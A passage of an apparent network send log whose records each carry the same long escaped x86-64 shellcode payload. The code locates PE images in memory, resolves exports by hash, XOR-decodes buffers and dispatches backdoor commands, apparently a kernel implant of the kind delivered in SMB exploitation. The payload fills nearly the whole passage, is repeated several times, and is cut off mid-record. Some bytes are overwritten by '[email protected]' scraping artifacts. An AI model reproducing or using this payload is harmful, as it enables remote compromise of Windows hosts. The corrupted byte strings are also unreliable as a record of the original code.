\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 11, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 12, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 